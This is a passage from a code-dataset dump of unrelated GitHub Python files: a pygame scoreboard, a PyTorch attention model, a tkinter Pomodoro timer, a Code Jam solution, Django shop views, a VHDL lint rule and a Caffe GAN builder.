Plane(self.ai_settings,self.screen)\n plane.rect.x =10 +life*40\n plane.rect.y=10\n _image = pygame.image.load(\"images\\\\hero_plane_1.png\")\n heart =pygame.transform.scale(_image,(40,40))\n plane.set_image(heart)\n self.planes.add(plane)\n def init_level(self):\n level_str = str(self.stats.level)\n # 第二个布尔值参数这是否开启抗锯齿\n self.level_image = self.font.render(level_str, True, self.text_color, self)\n self.level_rect = self.level_image.get_rect()\n self.level_rect.right = self.screen_rect.right - 20\n self.level_rect.top = 43\n def init_score(self):\n score_str = str(self.stats.score)\n #第二个布尔值参数这是否开启抗锯齿\n self.score_image = self.font.render(score_str,True,self.text_color,self)\n self.score_rect =self.score_image.get_rect()\n self.score_rect.right = self.screen_rect.right-20\n self.score_rect.top =20\n def show_score(self):\n self.screen.blit(self.score_image,self.score_rect)\n self.screen.blit(self.level_image, self.level_rect)\n self.planes.draw(self.screen)\n def reset_score(self):\n self.stats.score=0\n def reset_level(self):\n self.stats.level=1\n\n","repo_name":"Mrxulovemingming/learngit","sub_path":"plane_game/score.py","file_name":"score.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18024978740","text":"\nimport torch.nn as nn\nimport torch\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\n\nimport os\n# device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n\n\nclass self_attention_net(nn.Module):\n def __init__(self, label_hidden_size, max_sen, atten_size):\n super(self_attention_net, self).__init__()\n self.hidden_size = label_hidden_size\n self.sen_len = max_sen\n self.attention_size = atten_size\n self.w_omega = Variable(torch.zeros(self.hidden_size * 2, self.attention_size).cuda())\n self.u_omega = Variable(torch.zeros(self.attention_size).cuda())\n\n def forward(self, lstm_output):\n # print(lstm_output.size()) = (batch_size,squence_length, hidden_size*layer_size)\n output_reshape = torch.Tensor.reshape(lstm_output, [-1, self.hidden_size * 2]).cuda()\n attn_tanh = torch.tanh(torch.mm(output_reshape, self.w_omega)).cuda()\n attn_hidden_layer = torch.mm(attn_tanh, torch.Tensor.reshape(self.u_omega, [-1, 1])).cuda()\n exps = torch.Tensor.reshape(torch.exp(attn_hidden_layer), [-1, self.sen_len]).cuda()\n alphas = exps / torch.Tensor.reshape(torch.sum(exps, 1), [-1, 1]).cuda()\n alphas_reshape = torch.Tensor.reshape(alphas, [-1, self.sen_len, 1]).cuda()\n attn_output = torch.sum(lstm_output * alphas_reshape, 1).cuda()\n # lstm_output = torch.sum(lstm_output,1)\n # out = torch.cat((attn_output,lstm_output),dim=1)\n #attn_output.size() num_class*hiddensize*2(双向lstm)\n return attn_output\n\n\n\nclass sen_attention_label(nn.Module):\n def __init__(self, num_class):\n super(sen_attention_label, self).__init__()\n self.class_num = num_class\n\n def forward(self, x, label):\n # x.size():(batch_size, hidden_size) query\n # label:(num_class, label_hidden_size*2) Xi\n ### 计算方式点积\n label = label.transpose(0, 1).cuda()\n # print('label.size():',label.size())\n m = torch.tanh(torch.mm(x, label)).cuda()\n exps = torch.exp(m).cuda()\n a = exps / torch.Tensor.reshape(torch.sum(exps, 1), [-1, 1]).cuda() ###算权重\n a_reshape = torch.Tensor.reshape(a, [self.class_num, -1]).cuda()\n self.a = a.detach()\n self.a_reshape = a_reshape.detach()\n # print('a_reshape',a_reshape.size())\n # label_attn_output = label_attn_output.transpose(0, 1)\n # print('label_attn_output.size():', label_attn_output.size())\n finalx = torch.mm(label, a_reshape).cuda()\n self.finalx = finalx.detach()\n finalx = finalx.transpose(0, 1).cuda()\n\n # finalx = torch.mm(x, finalx)\n # print('finalx',finalx.size())\n\n # lstm_output = torch.sum(lstm_output, 1)\n # out = torch.cat((sen_attn_output, finalx), dim = 1) #横着拼 (batch_size, hidden_size*layer_size*2)\n # out = torch.cat((x, finalx), dim=1).cuda()\n # out = (x + finalx).cuda()\n # print('out', out.size())\n # lstm_output = torch.sum(lstm_output, 1)\n # output = torch.cat((lstm_output, out), dim = 1)\n return finalx\n\n\n\nclass label_layer(nn.Module):\n def __init__(self, num_class, embed_dim, label_hidden_size, max_sen, atten_size):\n super(label_layer, self).__init__()\n self.class_num = num_class\n self.embed_dim = embed_dim\n self.hidden_size = label_hidden_size\n self.attention_net = self_attention_net(label_hidden_size,max_sen,atten_size)\n self.lstm = nn.LSTM(embed_dim, label_hidden_size, 1, batch_first=True,\n dropout=0.5,\n bidirectional=True)\n self.sen_attention_label = sen_attention_label(num_class=num_class)\n\n def forward(self, x, label):\n s, b, f = label.size()\n h_0 = Variable(torch.zeros(2, s, self.hidden_size).cuda())\n c_0 = Variable(torch.zeros(2, s, self.hidden_size).cuda())\n label, (final_hidden_state, final_cell_state) = self.lstm(label, (h_0, c_0))\n label = self.attention_net(label)\n out = self.sen_attention_label(x, label)\n return out\n\n\n####主\nclass multi_atten_lstm(torch.nn.Module):\n def __init__(self, output_size, hidden_size, embed_dim, sequence_length, num_class,\n atten_size, label_embed, label_max_sen, dropout):\n super(multi_atten_lstm, self).__init__()\n\n self.label_embed = label_embed\n\n self.output_size = output_size\n self.hidden_size = hidden_size\n #对应特征维度\n self.embed_dim = embed_dim\n self.dropout = dropout\n self.num_class = num_class\n #对应时间步长\n self.sequence_length = sequence_length\n self.bidirectional = True\n #1层lstm\n self.layer_size = 1\n self.lstm = nn.LSTM(self.embed_dim,self.hidden_size,self.layer_size, dropout=self.dropout,\n batch_first=True,\n bidirectional= self.bidirectional\n )#(squence_length, batch_size, hidden_size*layer_size)\n if self.bidirectional:\n self.layer_size = self.layer_size * 2\n else:\n self.layer_size = self.layer_size\n # self.layer_size = self.layer_size\n self.attention_size = atten_size\n\n self.label_layer = label_layer(num_class=self.num_class, embed_dim=embed_dim, label_hidden_size=hidden_size,\n max_sen=label_max_sen, atten_size=atten_size)\n\n self.last = nn.Linear(hidden_size * self.layer_size, output_size)\n\n def init_hidden(self, batch_size):\n return (torch.zeros(self.layer_size,batch_size,self.hidden_size,dtype=torch.float32).cuda(),\n torch.zeros(self.layer_size,batch_size,self.hidden_size,dtype=torch.float32).cuda())\n\n\n\n def forward(self, input):\n batch_size = input.size(0)\n input_hidden = self.init_hidden(batch_size)\n\n lstm_output, _ = self.lstm(input, input_hidden)\n lstm_output = torch.sum(lstm_output, 1)\n label = self.label_layer(lstm_output,self.label_embed)\n\n # ###形成句子向量\n # lstm_output = torch.sum(lstm_output, 1)\n # label_lstm_out = torch.sum(label_lstm_out, 1)\n\n out = (lstm_output+label).cuda()\n\n logits = self.last(out)\n return logits","repo_name":"ceceliax/LIE","sub_path":"LIE2/model/multi_atten.py","file_name":"multi_atten.py","file_ext":"py","file_size_in_byte":6370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41726711307","text":"import time\nimport math\nimport threading\nimport tkinter as tk\nfrom tkinter import ttk, PhotoImage\n\nPOMODORO_MINUTES = 25\nSHORT_REST_MINUTES = 5\nLONG_REST_MINUTES = 15\n\nSMALL_FONT = (\"Ubuntu\", 12)\nTOMATO_TEXT = ''\n\nclass PomodoroTimer:\n def __init__(self):\n self.root = tk.Tk()\n # self.root.geometry(\"350x150\")\n self.root.title(\"Pomodoro Timer [insert some tomato here]\")\n # tomato = PhotoImage(file=\"tomato.png\")\n # self.root.tk.call('wm','iconphoto', self.root._w, tomato)\n\n self.s = ttk.Style()\n self.s.configure(\"TNotebook.Tab\", font=SMALL_FONT)\n self.s.configure(\"TButton\", font=SMALL_FONT)\n\n self.tabs = ttk.Notebook(self.root)\n self.tabs.pack(fill=\"both\", pady=10, expand=True)\n\n self.tab1 = ttk.Frame(self.tabs)\n self.tab2 = ttk.Frame(self.tabs)\n self.tab3 = ttk.Frame(self.tabs)\n\n self.pomodoro_timer_label = ttk.Label(self.tab1, text=f\"{POMODORO_MINUTES:02d}:00\", font=(\"Ubuntu\",48))\n self.pomodoro_timer_label.pack()\n\n self.short_rest_timer_label = ttk.Label(self.tab2, text=f\"{SHORT_REST_MINUTES:02d}:00\", font=(\"Ubuntu\",48))\n self.short_rest_timer_label.pack()\n\n self.long_rest_timer_label = ttk.Label(self.tab3, text=f\"{LONG_REST_MINUTES:02d}:00\", font=(\"Ubuntu\",48))\n self.long_rest_timer_label.pack()\n\n self.tabs.add(self.tab1, text=\"Pomodoro\")\n self.tabs.add(self.tab2, text=\"Short Rest\")\n self.tabs.add(self.tab3, text=\"Long Rest\")\n\n\n self.grid_layout = ttk.Frame(self.root)\n self.grid_layout.pack(pady=(0,10),padx=10)\n\n self.pomodoro_counter_label = ttk.Label(self.grid_layout, text=\"Pomodoros: 0\", font=SMALL_FONT)\n self.pomodoro_counter_label.grid(row=0, column=0, columnspan=4, pady=(0,10))\n\n self.start_button = ttk.Button(self.grid_layout, text=\"Start\", command=self.start_timer_thread)\n self.start_button.grid(row=1, column=0)\n\n self.pause_button = ttk.Button(self.grid_layout, text=\"Pause\", command=self.pause_timer)\n self.pause_button.grid(row=1, column=1)\n\n self.skip_button = ttk.Button(self.grid_layout, text=\"Skip\", command=self.skip_timer)\n self.skip_button.grid(row=1, column=2)\n\n self.reset_button = ttk.Button(self.grid_layout, text=\"Reset\", command=self.reset_timer)\n self.reset_button.grid(row=1, column=3)\n\n\n\n self.pomodoro_counter = 0\n self.skipped = False\n self.stopped = False\n self.running = False\n self.paused = False\n\n self.root.mainloop()\n\n def start_timer_thread(self):\n if not self.running:\n t = threading.Thread(target=self.start_timer)\n t.start()\n self.running = True\n self.paused = False\n\n def start_timer(self):\n self.stopped = False\n self.skipped = False\n self.paused = False\n timer_id = self.tabs.index(self.tabs.select())\n\n\n self.time_counter(timer_id)\n\n \n if not self.stopped or self.skipped:\n if timer_id == 0:\n self.pomodoro_counter += 1\n self.pomodoro_counter_label.configure(text=f\"Pomodoros: {self.pomodoro_counter}\")\n if self.pomodoro_counter % 4 == 0:\n self.tabs.select(2)\n else:\n self.tabs.select(1)\n elif timer_id == 1 or timer_id == 2:\n self.tabs.select(0)\n self.start_timer()\n\n def time_counter(self, timer_id):\n if timer_id == 0:\n full_seconds = 60 * POMODORO_MINUTES\n elif timer_id == 1:\n full_seconds = 60 * SHORT_REST_MINUTES\n elif timer_id == 2:\n full_seconds = 60 * LONG_REST_MINUTES\n while full_seconds > 0 and not self.stopped:\n\n if not self.paused:\n minutes, seconds = divmod(full_seconds,60)\n minutes = int(minutes)\n seconds = math.floor(seconds)\n\n time.sleep(0.1)\n full_seconds -= 0.1\n\n if timer_id == 0:\n self.pomodoro_timer_label.configure(text=f\"{minutes:02d}:{seconds:02d}\")\n elif timer_id == 1:\n self.short_rest_timer_label.configure(text=f\"{minutes:02d}:{seconds:02d}\")\n elif timer_id == 2:\n self.long_rest_timer_label.configure(text=f\"{minutes:02d}:{seconds:02d}\")\n self.root.update()\n \n self.reset_labels()\n\n def pause_timer(self):\n self.paused = not self.paused\n\n\n def reset_timer(self):\n self.stopped = True\n self.skipped = False\n self.running = False\n self.paused = False\n\n self.pomodoro_counter = 0\n self.pomodoro_counter_label.configure(text=\"Pomodoros: 0\")\n \n \n self.reset_labels()\n\n\n def skip_timer(self):\n \n self.skipped = True\n self.stopped = True\n self.paused = False\n \n def reset_labels(self):\n self.pomodoro_timer_label.configure(text=f\"{POMODORO_MINUTES:02d}:00\")\n self.short_rest_timer_label.configure(text=f\"{SHORT_REST_MINUTES:02d}:00\") \n self.long_rest_timer_label.configure(text=f\"{LONG_REST_MINUTES:02d}:00\")\n \nif __name__ == '__main__':\n PomodoroTimer()","repo_name":"alceuramos/pomodoro-timer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5321,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23577055411","text":"#!/opt/local/bin/python\n\n\"\"\"Premature optimization is the root of all evil.\"\"\"\n\nimport sys\nimport re\n\nfrom math import ceil, floor\n\ndef isaset(nums, R):\n minx = ceil(10*nums[0]/(11*R[0]))\n manx = floor(10*nums[0]/(9*R[0]))\n for i in range(1, len(R)):\n r = [ceil(10*nums[i]/(11*R[i])), floor(10*nums[i]/(9*R[i]))]\n minx = min(minx, r[0])\n manx = max(manx, r[1])\n return minx <= manx\n\n\ndef doit(N, P, R, amts):\n \"\"\"Well, lets get the small case at least...\"\"\"\n\n srs = [0 for _ in R]\n for i in range(len(R)):\n srs[i] = [(ceil(10*a/(11*R[i])), floor(10*a/(9*R[i]))) for a in amts[i]]\n\n sets = 0\n usd = [0 for _ in R]\n while usd[0] < len(srs[0]):\n good = True\n r = srs[0][usd[0]]\n if r[1] < r[0]:\n usd[0] += 1\n continue\n t = usd[:]\n for I in range(1,len(R)):\n t[I] = usd[I]\n while srs[I][t[I]][1] < r[0]:\n t[I] += 1\n if t[I] >= len(srs[I]):\n good = False\n break\n if good and srs[I][t[I]][0] > r[1]:\n good = False\n usd[I] = t[I]\n if not good:\n break\n if good:\n usd[1:] = [x + 1 for x in t[1:]]\n sets += 1\n usd[0] += 1\n\n return sets\n\n \n\nT = int(sys.stdin.readline())\nfor casenum in range(T):\n data = [int(x) for x in sys.stdin.readline().split()]\n rec = [int(z) for z in sys.stdin.readline().split()]\n amts = []\n for i in range(data[0]):\n amts.append(sorted([int(y) for y in sys.stdin.readline().split()]))\n n = doit(data[0], data[1], rec, amts)\n\n\n\n\n print(\"Case #\" + str(casenum + 1) + \": \" + str(n))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_204/186.py","file_name":"186.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4239446975","text":"from datetime import datetime\nfrom typing import Union\n\n__all__ = [\"DateTime\"]\n\n\nclass DateTime(datetime):\n @classmethod\n def _validate_timestamp(cls, value) -> Union[int, float]:\n assert isinstance(value, (int, float)), f\"{value} is not valid.\"\n return value\n\n @classmethod\n def _validate_date(cls, other):\n assert isinstance(other, datetime), f\"Send {datetime} obj\"\n return other\n\n @classmethod\n def days_from_timestamp(cls, timestamp):\n return timestamp / (3600 * 24)\n\n @classmethod\n def into_timestamp(cls, days=0, min_=0, sec=0):\n days = 3600 * 24 * days if cls._validate_timestamp(days) else days\n min_ = 3600 * 60 * min_ if cls._validate_timestamp(min_) else min_\n return days + min_ + cls._validate_timestamp(sec)\n\n def add(self, days=0, min_=0, sec=0):\n return self.fromtimestamp(\n self.timestamp() + self.into_timestamp(days, min_, sec)\n )\n\n def sub(self, days=0, min_=0, sec=0):\n return self.fromtimestamp(\n abs(self.timestamp() - self.into_timestamp(days, min_, sec))\n )\n\n def days_between(self, other):\n return self.days_from_timestamp(\n abs(self.timestamp() - self._validate_date(other).timestamp())\n )\n\n def compare(self, other):\n \"\"\"\n compares date time and\n returns 1 if the instantiated date is greater,\n -1 if the instantiated date is less than,\n and 0 if they are equal.\n \"\"\"\n return (\n 1\n if self.timestamp() > self._validate_date(other).timestamp()\n else -1\n if self.timestamp() < self._validate_date(other).timestamp()\n else 0\n )\n","repo_name":"cereja-project/cereja","sub_path":"cereja/date/_datetime.py","file_name":"_datetime.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"61"} +{"seq_id":"42707305078","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.views import generic, View\nfrom .models import *\nfrom django.contrib.auth.decorators import login_required\nfrom django.conf import settings\nimport decimal\nfrom django.db.models import Q, F\nfrom .forms import ShipmentDetailForm, ConfirmedOrderDetailForm\nimport random\nfrom django.contrib import messages\nfrom django.http import JsonResponse\n\n\nclass Home (generic.TemplateView):\n \"\"\"\n Renders the index page\n \"\"\"\n template_name = 'index.html'\n\n\nclass ProductSearch(generic.ListView):\n \"\"\"\n Reders the user search for products by name\n \"\"\"\n model = Product\n template_name = 'products.html'\n paginate_by = 8\n\n def get_queryset(self):\n query = self.request.GET.get('search-product')\n return Product.objects.filter(available=True).filter(\n name__icontains=query).order_by('-created_on')\n\n\nclass Products (generic.ListView):\n \"\"\"\n Fetch products data from database and display on\n products.html\n \"\"\"\n queryset = Product.objects.filter(available=True).order_by('-created_on')\n template_name = 'products.html'\n paginate_by = 8\n\n\nclass ProductsCategory (generic.ListView):\n \"\"\"\n Display products based on categories\n \"\"\"\n queryset = Product.objects.filter(available=True).order_by('-created_on')\n template_name = 'products.html'\n paginate_by = 8\n\n def get_context_data(self, **kwargs):\n category_param = self.kwargs.get(\"category\")\n category = ProductCategories.objects.get(category_name=category_param)\n products = Product.objects.filter(product_category=category).filter(\n available=True).order_by('-created_on')\n return {'product_list': products}\n\n\nclass SpecialOffers (generic.ListView):\n \"\"\"\n Display products on special offers\n \"\"\"\n queryset = Product.objects.filter(available=True).filter(\n stock__gt=0).filter(~Q(discount_name=2)).order_by('-created_on')\n template_name = 'products.html'\n paginate_by = 8\n\n\nclass ProductDetail(generic.DetailView):\n \"\"\"\n Display product details\n \"\"\"\n def get(self, request, slug, *args, **kwargs):\n queryset = Product.objects.filter(\n slug=slug).order_by('-created_on')\n product = get_object_or_404(queryset)\n\n discount = 0\n if product.discount_name.discount_percentage > 0:\n discount = (float(product.discount_name.discount_percentage)\n * float(product.price)) / 100\n discount = product.price-decimal.Decimal(discount)\n\n product_wish = False\n add_to_cart = False\n if request.user.is_authenticated:\n if Wishes.objects.filter(user=request.user, wish_id=product.id):\n product_wish = True\n else:\n product_wish = False\n if request.session.get('cart') is not None:\n if str(product.id) in request.session.get('cart'):\n add_to_cart = True\n else:\n add_to_cart = False\n return render(\n request,\n \"product_detail.html\",\n {\n 'product': product,\n 'product_wish': product_wish,\n 'add_to_cart': add_to_cart,\n 'discount': discount,\n },\n )\n\n\nclass Wishlist(generic.ListView):\n \"\"\"\n Display user products in wishlist once logged in\n \"\"\"\n paginate_by = 8\n template_name = 'wishlist.html'\n context_object_name = 'wishlist'\n\n def get_queryset(self):\n return Wishes.objects.filter(user=self.request.user)\n\n\nclass AddToWishlist(View):\n \"\"\"\n Add / remove items to wishlist modal without page refresh\n \"\"\"\n def post(self, request):\n if request.method == 'POST':\n if request.user.is_authenticated:\n prod_id = int(request.POST.get('productId'))\n product_check = Product.objects.get(id=prod_id)\n if product_check:\n if Wishes.objects.filter(\n user=request.user, wish_id=prod_id):\n wish_delete = get_object_or_404(\n Wishes, user=request.user, wish_id=prod_id)\n wish_delete.delete()\n else:\n Wishes.objects.create(\n user=request.user, wish_id=prod_id)\n return redirect('/')\n\n\ndef cart(request):\n \"\"\"\n Display cart items and total based on cart products\n \"\"\"\n if request.method == 'POST':\n cart = request.session.get(settings.CART_SESSION_ID)\n request.session.cart = cart\n prod_id = str(request.POST.get('productId'))\n del request.session.cart[prod_id]\n request.session.modified = True\n return redirect('/')\n total = 0.00\n ship_total = 5.00\n if request.session.get('cart') is not None and request.session.get('cart'):\n ids = []\n\n for key, value in request.session.get('cart').items():\n total += value['prod_total']\n ids.append(str(key))\n\n products = Product.objects.filter(available=True).filter(\n stock__gt=0).filter(id__in=ids)\n ship_total = round(ship_total + total, 2)\n else:\n products = []\n cart = 'Nothing in cart'\n context = {\n 'products': products,\n 'total': round(total, 2),\n 'ship_total': ship_total,\n }\n return render(request, 'cart.html', context)\n\n\nclass AddToCart(View):\n \"\"\"\n Add / remove cart items from cart session without page refresh\n items in session are product id, quantity, price, discount, and its total\n \"\"\"\n def post(self, request):\n if request.method == 'POST':\n prod_id = str(request.POST.get('productId'))\n prod_quantity = int(request.POST.get('productQuantity'))\n product_price = float(request.POST.get('price'))\n if request.POST.get('discount') is not None:\n prod_discount = float(request.POST.get('discount'))\n prod_total = prod_discount * prod_quantity\n else:\n prod_discount = 0.0\n prod_total = product_price * prod_quantity\n prod_total = round(prod_total, 2)\n self.session = request.session\n cart = self.session.get(settings.CART_SESSION_ID)\n if not cart:\n cart = self.session[settings.CART_SESSION_ID] = {}\n self.cart = cart\n if prod_id not in self.cart:\n self.cart[prod_id] = {\n 'quantity': prod_quantity,\n 'price': product_price,\n 'discount': prod_discount,\n 'prod_total': prod_total,\n }\n else:\n del self.cart[prod_id]\n request.session.modified = True\n return redirect('/')\n else:\n return redirect('/')\n\n\nclass Checkout(View):\n \"\"\"\n Shipment details are fetched if already exists, else\n show empty form for user to fill\n \"\"\"\n def get(self, request):\n if request.user.is_authenticated:\n get_user_last_data = ShipmentDetail.objects.filter(\n user=request.user)\n if get_user_last_data:\n instance = get_object_or_404(\n get_user_last_data, user=request.user)\n form = ShipmentDetailForm(instance=instance)\n else:\n form = ShipmentDetailForm()\n return render(\n request,\n \"user_checkout.html\",\n {\n 'form': form,\n },\n )\n\n def post(self, request):\n \"\"\"\n Update the Shipment detail modal form if needed else forward it as it\n is and add new order data to Confirmed Order Detail and user bill\n modals with invoice number.\n \"\"\"\n if request.user.is_authenticated:\n get_user_last_data = ShipmentDetail.objects.filter(\n user=request.user)\n if request.session.get('cart'):\n if get_user_last_data:\n instance = get_object_or_404(ShipmentDetail,\n user=request.user)\n form = ShipmentDetailForm(request.POST, instance=instance)\n if form.is_valid():\n fetch_user = form.save(commit=False)\n fetch_user.user = request.user\n messages.success(request,\n 'Shipment data set successfully')\n form.save()\n else:\n return redirect('checkout')\n else:\n form = ShipmentDetailForm(request.POST)\n if form.is_valid():\n fetch_user = form.save(commit=False)\n fetch_user.user = request.user\n messages.success(request,\n 'Shipment data added successfully')\n form.save()\n else:\n messages.error(request,\n 'Your data was not saved')\n return render(\n request,\n 'user_checkout.html',\n {\n 'form': form\n })\n else:\n messages.success(self.request, 'Order Already placed')\n return redirect('myorders')\n overall_total = 0.00\n invoice_no = generate_invoice_number()\n\n if not request.session.get('cart'):\n messages.success(self.request, 'Order Already placed')\n return redirect('myorders')\n else:\n for key, value in request.session.get('cart').items():\n overall_total += value['prod_total']\n prod_id = Product.objects.get(id=key)\n product_quantity_update = Product.objects.filter(\n id=key).update(stock=F('stock') - value['quantity'])\n add_confirmed_order = ConfirmedOrderDetail(\n user_info=request.user,\n product_info=prod_id,\n quantity=value['quantity'],\n prod_total=value['prod_total'],\n user_unique_order_no=invoice_no\n )\n add_confirmed_order.save()\n\n overall_total = round(5.00 + overall_total, 2)\n user_shipment_id = ShipmentDetail.objects.get(user=request.user)\n user_bill_ref = UserBill(\n user_info=request.user,\n shipment_info=user_shipment_id,\n total=overall_total,\n user_unique_order_no=invoice_no\n )\n user_bill_ref.save()\n messages.success(request, 'Order placed sucessfully')\n del request.session['cart']\n\n return render(\n request,\n \"order_complete.html\",\n {\n 'form': form,\n },\n )\n\n\ndef generate_invoice_number():\n \"\"\"\n This function generate random invoice number based on\n the fact that it does't already exist in modal for new\n orders\n \"\"\"\n is_not_unique = True\n while is_not_unique:\n invoice_no_ref = random.randint(1000000000, 9999999999)\n if not ConfirmedOrderDetail.objects.filter(\n user_unique_order_no=invoice_no_ref):\n is_not_unique = False\n return str(invoice_no_ref)\n\n\nclass MyOrders(View):\n \"\"\"\n This View show the users orders in my orders user can also update the\n quantity of product based on need.\n Note: Parts of Get function is modified using chat gpt due to an issue\n where form and products data couldn't be zipped togther as list.\n kindly see Testing.md bug#4 for more details.\n \"\"\"\n def get(self, request):\n get_products = {}\n form_instances = []\n if request.user.is_authenticated:\n get_invoice_list = UserBill.objects.filter(\n user_info=request.user).values_list(\n 'user_unique_order_no', flat=True)\n if get_invoice_list:\n for invoice_number in get_invoice_list:\n products_data = ConfirmedOrderDetail.objects.filter(\n user_unique_order_no=invoice_number).values_list(\n 'product_info',\n 'product_info__image',\n 'product_info__name',\n 'quantity', 'prod_total',\n 'product_info__stock',\n )\n form_instances_for_invoice = []\n for product_data in products_data:\n instance = get_object_or_404(\n ConfirmedOrderDetail,\n user_unique_order_no=invoice_number,\n product_info=product_data[0]\n )\n form = ConfirmedOrderDetailForm(instance=instance)\n form_instances_for_invoice.append(form)\n get_products[invoice_number] = {\n 'product_info': products_data,\n 'form_instances': form_instances_for_invoice,\n }\n form_instances.extend(form_instances_for_invoice)\n\n return render(\n request,\n \"my_orders.html\",\n {\n 'get_products': get_products,\n 'form_instances': form_instances,\n },\n )\n\n def post(self, request):\n if 'quantity' in request.POST:\n quantity = request.POST['quantity']\n confirmed_product_id = request.POST['product_instance_id']\n product_id = ConfirmedOrderDetail.objects.get(\n id=confirmed_product_id).product_info.id\n product_total = Product.objects.get(\n id=product_id).discount_name.discount_percentage\n discount = 0\n queryset = Product.objects.filter(\n id=product_id).order_by('-created_on')\n product = get_object_or_404(queryset)\n if product.discount_name.discount_percentage > 0:\n discount = (float(product.discount_name.discount_percentage)\n * float(product.price)) / 100\n discount = product.price-decimal.Decimal(discount)\n else:\n discount = product.price\n new_total = float(quantity) * float(discount)\n instance = get_object_or_404(\n ConfirmedOrderDetail, id=confirmed_product_id)\n form = ConfirmedOrderDetailForm(request.POST, instance=instance)\n if form.is_valid():\n form.save()\n ConfirmedOrderDetail.objects.filter(\n id=confirmed_product_id).update(prod_total=round(\n new_total, 2))\n messages.success(request, 'Quantity updated sucessfully')\n return redirect('myorders')\n return self.get(request)\n\n\ndef delete_order(request, product_key):\n \"\"\"\n This view cancels the orders\n \"\"\"\n order_detail = ConfirmedOrderDetail.objects.filter(\n user_unique_order_no=product_key)\n user_bill = UserBill.objects.filter(user_unique_order_no=product_key)\n order_detail.delete()\n user_bill.delete()\n messages.success(request, 'Order cancelled sucessfully')\n return redirect('myorders')\n\n\ndef remove_product(request, product_key, total, prod_id):\n \"\"\"\n This view remove products from orders\n \"\"\"\n item = UserBill.objects.filter(\n user_unique_order_no=product_key).values_list(\n 'total', flat=True)\n update_total = float(item[0]) - float(total)\n update_user_bill = UserBill.objects.filter(\n user_unique_order_no=product_key).update(total=update_total)\n order_detail = ConfirmedOrderDetail.objects.filter(\n user_unique_order_no=product_key).filter(product_info__id=prod_id)\n order_detail.delete()\n messages.success(request, 'Item removed sucessfully')\n return redirect('myorders')\n","repo_name":"MBilalQureshi/cosmos-beauty-pp4","sub_path":"ecommerce/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":16501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22946511283","text":"\nfrom vsg.rules import align_tokens_in_region_between_tokens as Rule\n\nfrom vsg import token\n\nlAlign = []\nlAlign.append(token.association_element.assignment)\n\noBegin = token.procedure_call.open_parenthesis\noEnd = token.procedure_call.close_parenthesis\n\n\nclass rule_401(Rule):\n '''\n This rule checks the alignment of :code:`=>` keywords in procedure calls.\n\n |configuring_keyword_alignment_rules_link|\n\n **Violation**\n\n .. code-block:: vhdl\n\n connect_ports(\n port_1=> data,\n port_2 => enable,\n port_3 => overflow,\n port_4 => underflow\n );\n\n **Fix**\n\n .. code-block:: vhdl\n\n connect_ports(\n port_1 => data,\n port_2 => enable,\n port_3 => overflow,\n port_4 => underflow\n );\n '''\n\n def __init__(self):\n Rule.__init__(self, 'procedure_call', '401', lAlign, oBegin, oEnd)\n self.solution = 'Align =>.'\n self.subphase = 2\n self.bIncludeTillBeginningOfLine = True\n","repo_name":"jeremiah-c-leary/vhdl-style-guide","sub_path":"vsg/rules/procedure_call/rule_401.py","file_name":"rule_401.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":150,"dataset":"github-code","pt":"61"} +{"seq_id":"39242819051","text":"#!/usr/bin/env python\n##########################################################\n# File Name: GAN.py\n# Author: gaoyu\n# mail: gaoyu14@pku.edu.cn\n# Created Time: 2018-04-30 23:12:56\n##########################################################\n\nimport yaml\nfrom pycaffe import *\n\nimport data_layer.illu_data\nimport cnn\nimport loss\n\nclass GAN:\n def __init__(self, args):\n self.param = yaml.load(open(args.net, 'r'))\n self.name = args.net.replace(\".yaml\", \"\")\n self.prefix = args.o\n\n def save_proto(self, net, token):\n fname = os.path.join(self.prefix, token + \".prototxt\")\n with open(fname, 'w') as f:\n f.write(str(net.to_proto()))\n\n def make_data(self, mode):\n return data_layer.illu_data.illu_data(config = self.param, mode = mode)\n \n def make_cnn(self, session, freeze, mode):\n Type = self.param['net'][self.param['net'][session]][\"type\"]\n builder = getattr(cnn, Type)(session, self.param['net'], mode = mode) \n builder.freeze = freeze\n builder.use_global_stats = (mode != \"training\") or (freeze) \n return builder.build\n\n def make_loss(self, net, session, label, data, pic, cls):\n loss.GeneratorLoss(net, self.param).add_loss(label, data, pic)\n loss.ClassfierLoss(net, self.param).add_loss(cls, session)\n\n def deploy_net(self): \n mode = \"deploy\"\n freeze = True\n net = caffe.NetSpec()\n data, label = self.make_data(mode)\n output = self.make_cnn(\"G\", freeze, mode)(data)\n net.Output = output\n self.save_proto(net, \"deploy\")\n\n def concat_label_output(self, label, output):\n #build cls label with batch_size * 2\n return L.Concat(label, output,\n name = \"ClsData\",\n concat_param = dict(axis = 0),\n propagate_down = [0, 1])\n\n def trainG_net(self):\n mode = \"training\"\n net = caffe.NetSpec()\n data, label = self.make_data(mode)\n output = self.make_cnn(\"G\", False, mode)(data)\n net.Output = output\n concat = self.concat_label_output(label, output)\n cls = self.make_cnn(\"P\", True, mode)(concat)\n net.Cls = cls\n self.make_loss(net, \"G\", label, data, output, cls)\n self.save_proto(net, \"trainG\")\n\n def trainP_net(self):\n mode = \"training\"\n net = caffe.NetSpec()\n data, label = self.make_data(mode)\n output = self.make_cnn(\"G\", True, mode)(data)\n net.Output = output\n concat = self.concat_label_output(label, output)\n cls = self.make_cnn(\"P\", False, mode)(concat)\n net.Cls = cls\n self.make_loss(net, \"P\", label, data, output, cls)\n self.save_proto(net, \"trainP\")\n\n def 